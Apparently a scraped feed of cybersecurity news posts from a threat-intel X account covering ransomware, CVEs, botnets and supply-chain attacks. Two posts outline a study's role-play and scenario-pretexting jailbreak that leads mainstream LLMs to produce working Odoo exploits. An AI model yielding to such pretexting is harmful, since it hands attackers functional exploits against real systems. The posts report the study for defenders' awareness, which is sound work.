"🚨 Cl0p Leaks [-----] Korean Air Employee Records After Third-Party ERP Breach Cl0p claims it compromised Korean Air's catering partner KC&D Service by exploiting an Oracle E-Business Suite zero-day (CVE-2025-61882), then leaked employee names and bank account numbers from the partner's ERP server (hundreds of GB posted after alleged ransom refusal). This is high-risk for payroll fraud and targeted phishing, and it highlights third-party ERP weak links as a repeatable intrusion path. 🕷 Malware: Cl0p (ransomware/extortion group) 🎯 Target: South Korea/Aviation (employee PII via third-party" [X Link](https://x.com/ThreatSynop/status/2006348301185016073) 2025-12-31T12:54Z [--] followers, [---] engagements

"🚨 [----] Cybersecurity Forecast: AI Arms Race and Autonomous Self-Learning Malware Dark Reading predicts [----] will see attackers scale AI-driven phishing, deepfakes and automated vuln exploitation, while defenders race to deploy agentic automation for detection and containment. It warns of emerging malware autonomy (self-learning, tactic-shifting worms) and accelerating vendor consolidation/platformization that could reshape how security teams buy and operate tooling. 🕷 Malware: N/A 🎯 Target: Global/Multisector # Category: #CyberPredictions #AI #AgenticAI #AutonomousMalware #ThreatLandscape" [X Link](https://x.com/ThreatSynop/status/2006348843965714692) 2025-12-31T12:56Z [--] followers, [--] engagements

"🚨 Qilin Ransomware Claims New Breaches Across Israel and the U.S. The Qilin ransomware group alleges it breached three organizations, TaLachaim (Israel, stem cell preservation/medical services), Quasar Data Center (Houston, colocation/cloud/BCP) and Z-Tronix (California, manufacturing), signaling continued multi-sector extortion pressure and potential data-theft risk for healthcare and critical IT service providers. 🕷 Malware: Qilin Ransomware 🎯 Target: Israel/Healthcare + USA/Cloud & Manufacturing # Category: #Ransomware #Qilin #DataBreach #Israel #USA #Healthcare #DataCenter #Manufacturing" [X Link](https://x.com/ThreatSynop/status/2006349387304243240) 2025-12-31T12:59Z [--] followers, [--] engagements

"🚨 Threat Actors Manipulate LLMs to Automate Exploit Creation Against Enterprise Apps A new study shows attackers can social-engineer mainstream LLMs (e.g. GPT-4o/Claude) using structured pretexting (Role-play, Scenario, Action) to bypass safety guardrails and reliably generate functional exploit scripts, reportedly achieving 100% success in weaponizing Odoo ERP CVEs. This collapses the traditional skill barrier for exploitation and forces defenders to assume faster time-to-exploit even from low-skill actors. 🕷 Malware: N/A 🎯 Target: Global/Enterprise Software (Odoo ERP & open-source stacks) #" [X Link](https://x.com/ThreatSynop/status/2006365095064989922) 2025-12-31T14:01Z [--] followers, [--] engagements

"🚨 APT36 Abuses PDF.lnk Shortcuts to Drop In-Memory .NET RAT on Indian Government Targets APT36 (Transparent Tribe) is sending spear-phishing ZIP lures (Online JLPT Exam Dec) containing a fake PDF that is actually a large .pdf.lnk; opening it launches mshta.exe to pull a remote HTA (innlive.in) that Base64+XOR decodes ReadOnly/WriteOnly blocks and loads an encrypted RAT DLL directly in memory while displaying a real PDF as a decoy. 🕷 Malware: APT36 in-memory .NET RAT (DLL) 🎯 Target: India/Government & Strategic Entities # Category: #APT36 #TransparentTribe #SpearPhishing #LNK #MSHTA #HTA" [X Link](https://x.com/ThreatSynop/status/2006365638663508064) 2025-12-31T14:03Z [--] followers, [--] engagements

"🚨 AI Skepticism Surges as ROI Disappoints and Bubble Fears Grow As AI stock momentum cools and many enterprises report weak returns from GenAI pilots, prominent critics argue vendors overpromised while real-world reliability and cost issues persist. In cybersecurity, AI can accelerate vulnerability discovery/patching, but measurable benefits remain uneven and AI-washing concerns are rising. 🕷 Malware: N/A 🎯 Target: Global/Enterprises & Cybersecurity Operations # Category: #AI #GenAI #Cybersecurity #AIROI #AIBubble #AIWashing #SecurityAutomation #RiskManagement 🔗 URL:" [X Link](https://x.com/ThreatSynop/status/2006380883733799288) 2025-12-31T15:04Z [--] followers, [--] engagements

"🚨 IBM API Connect Critical Auth Bypass (CVE-2025-13915) Puts Exposed API Gateways at Risk IBM disclosed a critical authentication bypass (CVSS 9.8) in API Connect that can let remote attackers gain unauthorized access on affected versions (10.0.8.0-10.0.8.5, 10.0.11.0). Apply IBM's interim fix from Fix Central immediately; if you can't, disable Developer Portal self-service sign-up to reduce exposure. 🕷 Malware: N/A 🎯 Target: Global/Enterprises (API Management IBM API Connect) # Category: #CVE202513915 #IBM #APIConnect #AuthBypass #APISecurity #CriticalVuln #PatchNow #DevSecOps 🔗 URL:" [X Link](https://x.com/ThreatSynop/status/2006381973246193761) 2025-12-31T15:08Z [--] followers, [--] engagements

"🚨 When the Cloud Goes Down, Your Smart Devices Go Dumb Dark Reading highlights how mounting cloud outages (AWS, Cloudflare, Azure) are increasingly disrupting IoT-dependent daily life (smart homes, alarms, thermostats and routines) because many devices can't function without constant cloud connectivity. A mid-October AWS outage that lasted nearly [--] hours underscored the risk of centralized dependencies, making offline/fail-safe modes and resilience engineering a security and safety priority. 🕷 Malware: N/A 🎯 Target: Global/IoT & Smart Home Ecosystem # Category: #IoT #CloudOutage #Resilience" [X Link](https://x.com/ThreatSynop/status/2006383063366807954) 2025-12-31T15:12Z [--] followers, [--] engagements

"🚨 IBM API Connect Critical Auth Bypass (CVE-2025-13915, CVSS 9.8) A critical authentication-bypass flaw in IBM API Connect lets unauthenticated attackers gain unauthorized access on affected versions (10.0.8.0-10.0.8.5 and 10.0.11.0), risking API gateway takeover and downstream compromise of managed APIs. Patch immediately using IBM's interim fixes; if patching is delayed, disable Developer Portal self-service sign-up to reduce exposure. 🕷 Malware: N/A 🎯 Target: Global/Enterprises (API Management IBM API Connect) # Category: #CVE202513915 #IBM #APIConnect #AuthBypass #CriticalVuln #APISecurity" [X Link](https://x.com/ThreatSynop/status/2006383608131432932) 2025-12-31T15:15Z [--] followers, [--] engagements

"🚨 RondoDox Botnet Exploits React2Shell (CVE-2025-55182) to Breach Next.js Servers CloudSEK reports RondoDox began scanning for vulnerable Next.js hosts on Dec [--] and started deploying payloads days later, chaining single-request unauthenticated RCE into a botnet loader/health-checker, a cryptominer and a Mirai variant, while also removing competing malware and enforcing persistence via cron. 🕷 Malware: RondoDox (botnet) + Mirai variant + Coinminer 🎯 Target: Global/Next.js Web Servers + IoT (routers and connected devices) # Category: #RondoDox #React2Shell #CVE202555182 #Nextjs #RCE #Botnet" [X Link](https://x.com/ThreatSynop/status/2006390266542878835) 2025-12-31T15:41Z [--] followers, [---] engagements

"🚨 Singapore CSA Warns of Maximum-Severity SmarterMail RCE Flaw (CVE-2025-52691) CSA issued an alert for CVE-2025-52691 (CVSS 10.0), where an unauthenticated attacker can upload arbitrary files to the mail server and potentially achieve remote code execution; affected SmarterMail Build [----] and earlier should be upgraded to Build [----] immediately. 
🕷 Malware: N/A 🎯 Target: Singapore/Email Infrastructure (SmarterMail deployments) # Category: #CVE202552691 #SmarterMail #RCE #FileUpload #EmailSecurity #Vulnerability #PatchNow #CSA 🔗 URL:" [X Link](https://x.com/ThreatSynop/status/2006394451615236463) 2025-12-31T15:58Z [--] followers, [---] engagements

"🚨 Hackers Drain $3.9M From Unleash Protocol After Multisig Governance Hijack Attackers gained enough signing power to act as an admin in Unleash's multisig governance, pushed an unauthorized contract upgrade and enabled illicit withdrawals of WIP/USDC/WETH and related assets; stolen funds were then bridged out and routed into Tornado Cash to reduce traceability. 🕷 Malware: N/A 🎯 Target: Global/DeFi (Unleash Protocol users and on-chain assets) # Category: #CryptoHack #DeFi #Multisig #SmartContracts #GovernanceAttack #ContractUpgrade #TornadoCash #IncidentResponse 🔗 URL:" [X Link](https://x.com/ThreatSynop/status/2006411249018433752) 2025-12-31T17:04Z [--] followers, [--] engagements

"🚨 Trust Wallet Chrome Extension Hack Drains $8.5M After Shai-Hulud Supply-Chain Breach Trust Wallet says attacker-exposed GitHub secrets enabled theft of its Chrome Web Store API key, letting the actor publish a trojanized extension update (v2.68) that beaconed to attacker-controlled infrastructure and harvested wallet mnemonic phrases. About $8.5M was drained from [----] wallets, highlighting how developer-secret leakage can directly translate into consumer fund theft via compromised release pipelines. 🕷 Malware: Shai-Hulud (supply-chain worm) + trojanized Trust Wallet browser extension 🎯" [X Link](https://x.com/ThreatSynop/status/2006426492180349220) 2025-12-31T18:05Z [--] followers, [--] engagements

"🚨 GlassWorm Pivots to macOS: Malicious VS Code Extensions Use Encrypted JS + Solana C2 GlassWorm's latest wave targets macOS developers via three Open VSX extensions using AES-256-CBC-encrypted payloads embedded in compiled JavaScript plus a 15-minute execution delay to evade sandboxes, then stealing Keychain data and persisting via LaunchAgents. The campaign also uses Solana transaction memos (base64 URLs) as decentralized C2 and is preparing wallet-focused trojanization against Ledger Live and Trezor Suite. 🕷 Malware: GlassWorm 🎯 Target: Global/Developers (macOS, Web3/Crypto ecosystems) #" [X Link](https://x.com/ThreatSynop/status/2006427592035869015) 2025-12-31T18:09Z [--] followers, [--] engagements

"🚨 Researchers Show RSA Prompt Manipulation Can Turn Mainstream LLMs Into Exploit Generators A University of Luxembourg study shows attackers can use RSA (Role-assignment, Scenario-pretexting, Action-solicitation) to bypass LLM guardrails and generate working exploits from public CVE disclosures, achieving a reported 100% success rate against multiple Odoo ERP CVEs within [--] prompt rounds. This collapses the skill barrier for real compromise (DB exfiltration, backdoor creation, privilege escalation) and shortens defenders' effective patch window. 🕷 Malware: N/A (LLM manipulation technique: RSA) 🎯" [X Link](https://x.com/ThreatSynop/status/2006429243186507876) 2025-12-31T18:16Z [--] followers, [--] engagements

"🚨 Two U.S. Cybersecurity Pros Plead Guilty as ALPHV/BlackCat Affiliates Ryan Goldberg (GA) and Kevin Martin (TX) admitted they used ALPHV/BlackCat's RaaS to extort U.S. victims in [----], including $1.2M in Bitcoin from one organization, then laundered proceeds while paying the gang a 20% cut. The case underscores the insider-risk reality that defender-grade skills can dramatically accelerate ransomware intrusion and extortion operations. 🕷 Malware: ALPHV/BlackCat ransomware 🎯 Target: USA/Multiple Sectors # Category: #Ransomware #ALPHV #BlackCat #CyberCrime #Extortion #InsiderThreat #DOJ" [X Link](https://x.com/ThreatSynop/status/2006429792996933662) 2025-12-31T18:18Z [--] followers, [--] engagements

"🚨 Critical Apache StreamPipes Flaw Lets Low-Privilege Users Hijack Admin Accounts (CVE-2025-47411) Apache warns that StreamPipes 0.69.0-0.97.0 lets any authenticated non-admin abuse user-ID/JWT handling to impersonate an administrator and gain full platform control, enabling backdoor account creation, configuration tampering and streaming pipeline compromise. Patch by upgrading to 0.98.0 immediately. 🕷 Malware: N/A 🎯 Target: Global/Data Streaming & Analytics (Apache StreamPipes deployments) # Category: #Apache #StreamPipes #CVE202547411 #PrivilegeEscalation #JWT #Vulnerability #PatchNow" [X Link](https://x.com/ThreatSynop/status/2006430342736130133) 2025-12-31T18:20Z [--] followers, [--] engagements

"🚨 GlassWorm Worm Spreads via Malicious VS Code Extensions to Hit macOS Developers GlassWorm is propagating through Open VSX extensions using AES-encrypted JavaScript that sleeps [--] minutes to evade sandboxes, then pulls Solana blockchain-based C2 to run commands and steal macOS Keychain data. The campaign also contains code to trojanize Ledger Live/Trezor Suite, making developer machines a high-value pivot into both enterprise credentials and crypto assets. 🕷 Malware: GlassWorm 🎯 Target: Global/macOS Developers (VS Code + Open VSX; Web3 users at higher risk) # Category: #GlassWorm" [X Link](https://x.com/ThreatSynop/status/2006430409572122907) 2025-12-31T18:21Z [--] followers, [--] engagements

"🚨 Ivanti EPMM Zero-Days Turn Mobile MDM Into an Enterprise-Wide C2 Ivanti EPMM's spring [----] zero-day chain (CVE-2025-4427 + CVE-2025-4428) was weaponized against thousands of orgs, especially in Europe, letting attackers pivot from an internet-facing MDM server into enrolled phones, directory data and even cloud tokens (M365/Google Workspace/Salesforce). The case shows how legitimate admin features in endpoint management platforms can become stealth intrusion tooling without deploying custom malware. 🕷 Malware: N/A (tooling observed: FRP reverse-proxy) 🎯 Target: Global (notably" [X Link](https://x.com/ThreatSynop/status/2006438027741270220) 2025-12-31T18:51Z [--] followers, [--] engagements

"🚨 Apache StreamPipes Flaw Lets Any User Become Admin (CVE-2025-47411) A critical auth design failure in StreamPipes lets any authenticated low-privilege user tamper with JWT identity (e.g. swap their username to an existing admin) and instantly gain full administrative control across versions 0.69.0-0.97.0; attackers can then alter pipelines, access sensitive operational/business data and establish persistence. Upgrade to 0.98.0 immediately and audit admin accounts and recent auth logs for suspicious token activity. 🕷 Malware: N/A 🎯 Target: Global/Enterprises Using Apache StreamPipes (Data" [X Link](https://x.com/ThreatSynop/status/2006453196173308064) 2025-12-31T19:51Z [--] followers, [--] engagements

"🚨 Microsoft Teams Goes Secure by Default on Jan [--], [----] (Risky Files + Malicious Links Blocked) Microsoft will automatically enable three messaging protections for tenants on standard configurations: blocking weaponizable file types, real-time malicious URL detection with user warnings, and a false-positive reporting loop, raising baseline defenses against phishing and malware delivered through collaboration chats. 🕷 Malware: N/A 🎯 Target: Global/Enterprises Using Microsoft Teams # Category: #Microsoft #Teams #SecureByDefault #Phishing #Malware #URLFiltering #CollaborationSecurity #M365" [X Link](https://x.com/ThreatSynop/status/2006468365695815933) 2025-12-31T20:51Z [--] followers, [--] engagements

"🚨 NYC Mayoral Inauguration Bans Flipper Zero and Raspberry Pi Devices New York City's [----] mayoral inauguration FAQ explicitly bans Flipper Zero and Raspberry Pi devices, singling them out alongside traditional prohibited items, despite laptops and phones not being listed. The move reflects growing public-event concern over wireless/hacking-capable gear, but also highlights misunderstanding of real capability and risk, since more powerful devices remain allowed. 
🕷 Malware: N/A 🎯 Target: USA/Public Events & Physical Security # Category: #FlipperZero #RaspberryPi #PhysicalSecurity #EventSecurity" [X Link](https://x.com/ThreatSynop/status/2006513727684653526) 2025-12-31T23:52Z [--] followers, [--] engagements

"🚨 RondoDox Botnet Exploits React2Shell (CVE-2025-55182) to Hijack Next.js Servers and IoT Devices A nine-month RondoDox campaign is now exploiting the critical React2Shell RCE in Next.js/React Server Components to mass-compromise exposed systems (90K still vulnerable), dropping crypto-miners, a botnet loader/health-checker and a Mirai variant, while killing competing malware and persisting via cron. 🕷 Malware: RondoDox + Mirai variant + Coinminer 🎯 Target: Global/Web Servers (Next.js) + IoT (heaviest exposure in USA) # Category: #RondoDox #Botnet #React2Shell #CVE202555182 #Nextjs #RCE #Mirai" [X Link](https://x.com/ThreatSynop/status/2006680561029468580) 2026-01-01T10:55Z [--] followers, [--] engagements

"🚨 WhatsApp Backup Decryption Made Simple: wa-crypt-tools Supports .crypt12/.crypt14/.crypt15 Open-source wa-crypt-tools decrypts and (beta) re-encrypts WhatsApp/WhatsApp Business backup files when you provide the key, converting encrypted backups into readable SQLite/ZIP artifacts for DFIR and recovery workflows. 🕷 Malware: N/A 🎯 Target: Global/Mobile Forensics & WhatsApp Backups # Category: #WhatsApp #MobileForensics #DFIR #Encryption #E2EE #IncidentResponse #DigitalForensics #Tooling 🔗 URL: https://cybersecuritynews.com/whatsapp-crypt-tool/" [X Link](https://x.com/ThreatSynop/status/2006681108851618218) 2026-01-01T10:57Z [--] followers, [--] engagements

"🚨 87,000+ internet-exposed MongoDB servers still at risk from MongoBleed (CVE-2025-14847) Shadowserver telemetry shows tens of thousands of publicly reachable MongoDB instances remain unpatched, leaving them susceptible to unauthenticated memory-leak extraction that can expose credentials, API keys and other sensitive in-memory data. With active exploitation and CISA KEV listing, this is a high-urgency patch-and-exposure-reduction issue for any self-managed MongoDB deployment. 🕷 Malware: N/A 🎯 Target: Global / Databases (MongoDB) # Category: #MongoDB #MongoBleed #CVE202514847 #Vulnerability" [X Link](https://x.com/ThreatSynop/status/2006689880538055015) 2026-01-01T11:32Z [--] followers, [--] engagements

"🚨 Malicious Featured Chrome extensions with 900K installs siphon ChatGPT/DeepSeek chats Researchers found two AITOPIA lookalike Chrome extensions (one even Google Featured) that scrape ChatGPT/DeepSeek conversations from the page DOM, harvest active-tab URLs and session tokens, then exfiltrate data every [--] minutes (Base64) to attacker-controlled infrastructure (e.g. deepaichats.com, chatsaigpt.com). The campaign shows how trusted extension permissions can quietly turn AI prompts/responses, often containing sensitive corporate data, into a high-value leakage channel. 🕷 Malware: N/A (Malicious" [X Link](https://x.com/ThreatSynop/status/2006690426250465682) 2026-01-01T11:34Z [--] followers, [--] engagements

"🚨 DarkSpectre Zoom Stealer browser extensions exposed 2.2M users' meeting intelligence A cluster of malicious Chrome/Edge/Firefox extensions (often disguised as legitimate productivity tools) silently scraped conferencing data across Zoom, Microsoft Teams, Google Meet, Webex and others, then exfiltrated meeting URLs, attendee/speaker details, registration info and related assets via persistent WebSocket streams to attacker infrastructure, turning browser add-ons into a scalable corporate surveillance channel. 🕷 Malware: Zoom Stealer (DarkSpectre extension ecosystem) 🎯 Target: Global / Enterprise" [X Link](https://x.com/ThreatSynop/status/2006690973410038139) 2026-01-01T11:36Z [--] followers, [--] engagements

"🚨 Bluetooth exploit toolkit released for Airoha headphone flaws impacting major brands Researchers published full technical details and a testing toolkit for three Airoha-based Bluetooth vulnerabilities (CVE-2025-20700/20701/20702) that can be abused by an attacker within Bluetooth range to eavesdrop, tamper with firmware and impersonate headphones to hijack smartphone connections. 🕷 Malware: N/A 🎯 Target: Global / Consumer Electronics (Bluetooth Headphones) # Category: #Bluetooth #Airoha #CVE202520700 #CVE202520701 #CVE202520702 #FirmwareSecurity #WirelessSecurity #IoT 🔗 URL:" [X Link](https://x.com/ThreatSynop/status/2006691520645112005) 2026-01-01T11:38Z [--] followers, [--] engagements

"🚨 MongoBleed (CVE-2025-14847) exploited in the wild: unauthenticated MongoDB memory-leak now weaponized Attackers can send crafted compressed messages that make MongoDB return uninitialized heap memory pre-auth, leaking secrets like passwords/API keys at scale; public exploit code is already circulating and real-world incidents have been reported. Patch immediately (8.2.3/8.0.17/7.0.28/6.0.27/5.0.32/4.4.30) or temporarily disable zlib compression and remove MongoDB from direct internet exposure. 🕷 Malware: MongoBleed exploit (CVE-2025-14847) 🎯 Target: Global / Databases (MongoDB) #" [X Link](https://x.com/ThreatSynop/status/2006692615081673069) 2026-01-01T11:42Z [--] followers, [--] engagements

"🚨 Ubisoft shuts down Rainbow Six Siege & marketplace after apparent backend compromise Ubisoft took Rainbow Six Siege offline and halted its marketplace after reports of unauthorized bans, inventory manipulation and massive in-game currency anomalies, while rolling back transactions since 11:00 UTC as a containment step. Unverified claims suggest attackers may have pivoted from an exposed/misconfigured MongoDB (possibly via MongoBleed) into internal repos and backend tooling, raising concerns about broader code/asset exposure and follow-on account phishing. 🕷 Malware: N/A 🎯 Target: Global /" [X Link](https://x.com/ThreatSynop/status/2006693160622104645) 2026-01-01T11:45Z [--] followers, [---] engagements

"🚨 RondoDox botnet weaponizes React2Shell (CVE-2025-55182) to compromise Next.js servers CloudSEK reports active exploitation of the critical pre-auth RCE in React Server Components/Next.js, with RondoDox scanning for vulnerable servers and dropping botnet clients plus cryptominers, a loader/health-checker and a Mirai variant. The campaign blends rapid exploit-shotgun automation across web apps and IoT routers, making patching/mitigation urgent to prevent persistent footholds and resource hijacking. 🕷 Malware: RondoDox (Mirai variant + cryptominer payloads) 🎯 Target: Global / Next.js Web Apps" [X Link](https://x.com/ThreatSynop/status/2006758357911126100) 2026-01-01T16:04Z [--] followers, [--] engagements

"🚨 Trust Wallet confirms second Shai-Hulud supply-chain hit after $8.5M crypto theft Attackers used leaked developer GitHub secrets and a stolen Chrome Web Store API key to publish a tampered Trust Wallet Chrome extension (v2.68) that exfiltrated sensitive wallet data on every unlock and routed it to attacker infrastructure (metrics-trustwallet.com), enabling wallet draining. Trust Wallet rolled back to a clean build, restricted publishing credentials, began fund-tracking with partners and committed to reimbursing affected users. 
🕷 Malware: Shai-Hulud (supply-chain wallet drainer) 🎯 Target:" [X Link](https://x.com/ThreatSynop/status/2006774579277214127) 2026-01-01T17:08Z [--] followers, [--] engagements

"🚨 MongoBleed lessons: Pre-auth MongoDB memory-leak (CVE-2025-14847) is being exploited in the wild MongoBleed abuses zlib message decompression before authentication to leak uninitialized heap memory (credentials, API keys, tokens, PII) from internet-exposed MongoDB servers, with public PoC and confirmed active exploitation. Key actions: patch/upgrade, remove direct internet exposure, disable zlib compression as a temporary mitigation and rotate secrets post-fix. 🕷 Malware: MongoBleed (CVE-2025-14847) exploit 🎯 Target: Global / MongoDB Databases (Internet-exposed) # Category: #MongoDB" [X Link](https://x.com/ThreatSynop/status/2007017571749368023) 2026-01-02T09:14Z [--] followers, [--] engagements

"🚨 Modified Shai-Hulud worm spotted on npm with heavier obfuscation and new exfil targets A newly observed Shai-Hulud variant was found embedded in the npm package @vietmoney/react-big-calendar, renaming core components (bun_installer.js / environment_source.js) and adding new secret-harvest artifacts (e.g. 3nvir0nm3nt.json, cl0vd.json, actionsSecrets.json) while changing its GitHub exfil tagging to Goldox-T3chs: Only Happy Girl. Analysts believe this is live operator iteration (improved TruffleHog handling, Windows bun.exe support, dead-man switch removed), but a coding mismatch (c0nt3nts.json vs" [X Link](https://x.com/ThreatSynop/status/2007033791001272507) 2026-01-02T10:18Z [--] followers, [--] engagements

"🚨 Covenant Health breach impacts [------] after Qilin ransomware data theft Covenant Health updated regulators that a May [----] intrusion attributed to the Qilin ransomware group exposed data for [------] individuals, including SSNs, insurance details and treatment information, after its investigation concluded months later. Qilin claims it stole 850GB and has reportedly published the data, indicating extortion pressure and elevated identity-theft risk. 🕷 Malware: Qilin (ransomware) 🎯 Target: USA / Healthcare # Category: #DataBreach #Ransomware #Qilin #Healthcare #PHI #PII #Extortion" [X Link](https://x.com/ThreatSynop/status/2007049460807836068) 2026-01-02T11:20Z [--] followers, [--] engagements

"🚨 AI supercharged scams in 2025: voice clones, deepfakes and hyper-personalized social engineering Malwarebytes reports scammers are using AI to scale and personalize fraud with realistic text, cloned voices and synthetic video, making impersonation (from family to senior officials) far harder to spot and accelerating trust erosion in digital communications. The takeaway: verification-by-second-channel and tighter identity controls are now baseline defenses, not nice to have. 🎯 Target: Global / Consumers & Organizations (Social Engineering) # Category: #AIScams #SocialEngineering #Deepfakes" [X Link](https://x.com/ThreatSynop/status/2007050009804513342) 2026-01-02T11:23Z [--] followers, [--] engagements

"🚨 RondoDox botnet weaponizes React2Shell (CVE-2025-55182) to compromise Next.js servers SecurityWeek reports RondoDox operators actively exploit the pre-auth RCE flaw in React Server Components to enroll vulnerable Next.js servers, dropping a botnet framework that kills rival botnets/miners, establishes persistence and installs both a cryptominer and a Mirai variant. 🕷 Malware: RondoDox (drops cryptominer + Mirai variant) 🎯 Target: Global / Next.js Web Servers (AppSec) # Category: #React2Shell #CVE202555182 #Nextjs #React #Botnet #Mirai #Cryptomining #RCE #WebSecurity 🔗 URL:" [X Link](https://x.com/ThreatSynop/status/2007065862126047265) 2026-01-02T12:26Z [--] followers, [--] engagements

"🚨 Fake Eternl Desktop wallet email targets Cardano users with stealthy remote-access installer A phishing campaign lures Cardano users to download a malicious Eternl.msi from a newly registered domain that drops GoTo/LogMeIn Resolve Unattended components (unattended-updater.exe) and writes unattended.json to enable persistent remote control. The installer then beacons to legitimate GoTo Resolve endpoints to exfil system telemetry and maintain access, setting victims up for follow-on credential theft and wallet draining. 🕷 Malware: GoTo/LogMeIn Resolve Unattended (abused RMM) 🎯 Target: Global" [X Link](https://x.com/ThreatSynop/status/2007082697953304976) 2026-01-02T13:32Z [--] followers, [--] engagements

"🚨 Fintech Security 101: How to Protect Your Digital Wallet from Modern Fraud HackRead outlines core controls for wallet safety: strong authentication (MFA/biometrics), end-to-end encryption and continuous monitoring, while warning that phishing, device malware and public Wi-Fi remain the most common paths to account takeover and financial loss. 🎯 Target: Global / Fintech & Digital Wallet Users # Category: #Fintech #DigitalWallet #CyberSecurity #MFA #Encryption #Phishing #FraudPrevention #DataProtection 🔗 URL: https://hackread.com/protecting-digital-wallet-fintech-security/" [X Link](https://x.com/ThreatSynop/status/2007244716237058057) 2026-01-03T00:16Z [--] followers, [--] engagements

"🚨 VVS Stealer hides behind PyArmor to dodge signatures and steal Discord + browser secrets VVS Stealer (a PyInstaller-packed Python infostealer) uses PyArmor (AES-CTR string/bytecode encryption + BCC/C-compiled functions) to frustrate static analysis while harvesting Discord tokens (DPAPI decryption + session injection), browser credentials/cookies and persisting via the Windows Startup folder. 🕷 Malware: VVS Stealer (VVS $tealer) 🎯 Target: Global / Windows (Discord users + browser data) # Category: #Infostealer #VVSstealer #Discord #PyArmor #PyInstaller #CredentialTheft #TokenTheft" [X Link](https://x.com/ThreatSynop/status/2007388230316871912) 2026-01-03T09:47Z [--] followers, [--] engagements

"🚨 RondoDox Botnet Exploits React2Shell to Hijack 90K+ Exposed Next.js & IoT Devices RondoDox is actively exploiting the React2Shell flaw in Next.js (CVE-2025-55182) to mass-compromise routers, smart cameras and small business websites, with scans showing 90,300+ exposed systems. Post-compromise it drops a cryptominer (/nuts/poop), a Mirai variant (/nuts/x86) and a watchdog (/nuts/bolts) that kills competing malware every [--] seconds to keep exclusive control. 
🕷 Malware: RondoDox (drops cryptominer + Mirai variant) 🎯 Target: Global / Next.js Websites + Routers & Smart Cameras # Category:" [X Link](https://x.com/ThreatSynop/status/2007494721875083274) 2026-01-03T16:50Z [--] followers, [---] engagements "🚨 Finland arrests Fitburg crew over suspected undersea cable sabotage Finnish police arrested two crew members and detained the full 14-person crew of the Fitburg after investigators found signs the ship dragged its anchor and damaged an undersea telecom cable linking Helsinki and Estonia. The case matters because Baltic subsea cables are treated as critical infrastructure and repeated hybrid disruption incidents can escalate regional security risk and telecom resilience costs. 🎯 Target: Finland/Telecom (Undersea Cable Infrastructure) # Category: #UnderseaCables #CriticalInfrastructure" [X Link](https://x.com/ThreatSynop/status/2007574192066347422) 2026-01-03T22:06Z [--] followers, [--] engagements "🚨 ShinyHunters claims Resecurity breach firm says attackers only hit a monitored honeypot ShinyHunters posted Telegram screenshots alleging stolen internal chats employee data threat intel and client info but Resecurity says the accessed environment was an isolated honeypot seeded with synthetic datasets to observe the actors TTPs and infrastructure. Resecurity claims it logged extensive exfil automation via residential proxies and shared related telemetry with law enforcement. 
🎯 Target: Global / Cybersecurity (Resecurity) # Category: #ShinyHunters #Resecurity #DataBreach #Honeypot" [X Link](https://x.com/ThreatSynop/status/2007574741662478733) 2026-01-03T22:08Z [--] followers, [--] engagements "🚨 Holiday-timed ColdFusion exploitation surge: GreyNoise spots coordinated scans hitting 10+ CVEs GreyNoise observed [----] malicious requests targeting 10+ Adobe ColdFusion flaws (20232024) peaking on Dec [--] with 98% of traffic coming from two Japan-hosted IPs and using Interactsh + JNDI/LDAP-style OAST verificationsuggesting automated exploitation during reduced holiday monitoring. 🎯 Target: Global / Adobe ColdFusion Servers (Web & Enterprise Apps) # Category: #Adobe #ColdFusion #ExploitAttempts #Vulnerability #ThreatIntel #GreyNoise #RCE #LFI #AttackSurface 🔗 URL:" [X Link](https://x.com/ThreatSynop/status/2007577491116900596) 2026-01-03T22:19Z [--] followers, [--] engagements "🚨 Trump orders divestment of $2.9M Emcore chip assets from HieFo over China-linked control President Donald Trump issued an executive order forcing HieFo Corp. to divest Emcores chip and indium-phosphide wafer-fab assets within [---] days citing national security concerns and credible evidence the buyer is controlled by a Chinese citizen. The move follows a CFIUS review and highlights tighter U.S. scrutiny of even small semiconductor transactions tied to China. 🎯 Target: USA / Semiconductors & National Security # Category: #CFIUS #Semiconductors #NationalSecurity #ForeignInvestment" [X Link](https://x.com/ThreatSynop/status/2007578041199837589) 2026-01-03T22:21Z [--] followers, [--] engagements "🚨 Finland Seizes Fitburg as Undersea Cable Cut Triggers Sabotage Probe Finnish authorities detained the cargo ship Fitburg after a major fault severed an undersea data cable linking Helsinki and Estonia with investigators saying the vessel appeared to drag its anchor across the break site. 
Two crew members were arrested (two more travel-banned) and customs found sanctioned Russian steel on board escalating concerns the incident could be deliberate hybrid disruption of critical infrastructure. 🎯 Target: Finland & Estonia/Telecom # Category: #UnderseaCables #CriticalInfrastructure" [X Link](https://x.com/ThreatSynop/status/2007600759278338392) 2026-01-03T23:51Z [--] followers, [--] engagements "🚨 CES [----] Live Updates: Early TV Smart-Glasses and Phone Announcements Start Rolling In ZDNets live updates page previews CES [----] ahead of the January [--] show opening in Las Vegas noting the weeks pre-CES announcement surge and positioning TVs smart glasses and phones as key battleground categories. Its a signal that major vendors (e.g. Samsung and LG) are front-loading launches and narrative-setting before the show floor opens. 🎯 Target: Global/Consumer Tech # Category: #CES2026 #TechNews #ConsumerElectronics #SmartGlasses #TVTech #MobileTech #AI 🔗 URL:" [X Link](https://x.com/ThreatSynop/status/2007760021942075616) 2026-01-04T10:24Z [--] followers, [--] engagements "🚨 GreyNoise Flags Holiday Surge: One Actor Drives Thousands of Adobe ColdFusion Exploit Attempts GreyNoise logged [----] malicious requests over Christmas [----] targeting 10+ Adobe ColdFusion CVEs (20232024) with 98% of traffic traced to two CTG Server Limited-hosted IPs using automated JNDI/LDAP-style probes plus Interactsh (OAST) callbacks. Activity peaked on Dec [--] and disproportionately hit servers in the US Spain and Indiamaking patch hygiene and holiday-period monitoring critical. 🎯 Target: Global/Web Apps (Adobe ColdFusion) US Spain India # Category: #AdobeColdFusion" [X Link](https://x.com/ThreatSynop/status/2007812470719545594) 2026-01-04T13:52Z [--] followers, [--] engagements "🚨 Venezuela Internet Disruptions Spike as NetBlocks Flags Caracas Outages and Tor Usage Surges NetBlocks reported connectivity losses in parts of Caracas tied to power cuts during a U.S. 
